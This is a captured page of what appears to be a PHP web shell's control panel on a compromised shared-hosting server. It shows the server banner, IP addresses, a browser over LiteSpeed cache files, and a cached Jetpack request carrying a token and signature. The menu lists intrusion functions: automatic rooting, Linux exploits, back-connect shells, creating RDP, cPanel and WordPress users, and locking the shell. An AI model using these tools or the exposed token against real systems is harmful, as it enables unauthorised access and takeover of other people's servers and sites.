Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 13.58.247.192
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
temmmp /
lscache /
d /
7 /
a /
[ HOME SHELL ]
Name
Size
Permission
Action
d7a09b6e168f5118
21.47
KB
-rw-rw----
d7a16a150744752a
79.81
KB
-rw-rw----
d7a33e18c36c87bf
42.33
KB
-rw-rw----
d7a3a547d2055dc5
1.09
KB
-rw-rw----
d7a5f56bda4331bb
523
B
-rw-rw----
d7a87babced4292c
19.31
KB
-rw-rw----
d7a8af1b59991100
14.35
KB
-rw-rw----
d7adc28d046cc766
91.7
KB
-rw-rw----
d7afe16a385ec4a7
563
B
-rw-rw----
Delete
Unzip
Zip
${this.title}
Close
Code Editor : d7a3a547d2055dc5
LSCH��8dBd FO � : � ! /?rest_route=%2Fjetpack%2Fv4%2Fconnection%2F&_for=jetpack&token=IVvLR%24o%23Cq%25OITeuoR5A9OwpNt6bd9sT%3A1%3A0×tamp=1681449108&nonce=UEY3iUG8dr&body-hash&signature=4PDAqkeU%2FLefR4z1%2FMUlVRcvYCM%3D614_HTTP.200,614_default,614_URL.6666cd76f96956469e7be39d750cc7d9,614_REST,614_x-powered-by: PHP/7.2.34 content-type: application/json; charset=UTF-8 x-robots-tag: noindex link: <https://vigonow.shop/wp-json/>; rel="https://api.w.org/" x-content-type-options: nosniff access-control-expose-headers: X-WP-Total, X-WP-TotalPages, Link access-control-allow-headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type allow: GET vary: Origin x-litespeed-cache-control: public,max-age=604800 x-litespeed-tag: 614_HTTP.200,614_default,614_URL.6666cd76f96956469e7be39d750cc7d9,614_REST,614_ etag: "18285-1681449109;;;" {"isActive":true,"isStaging":false,"isRegistered":true,"isUserConnected":false,"hasConnectedOwner":true,"offlineMode":{"isActive":false,"constant":false,"url":false,"filter":false,"wpLocalConstant":false},"isPublic":true}
Close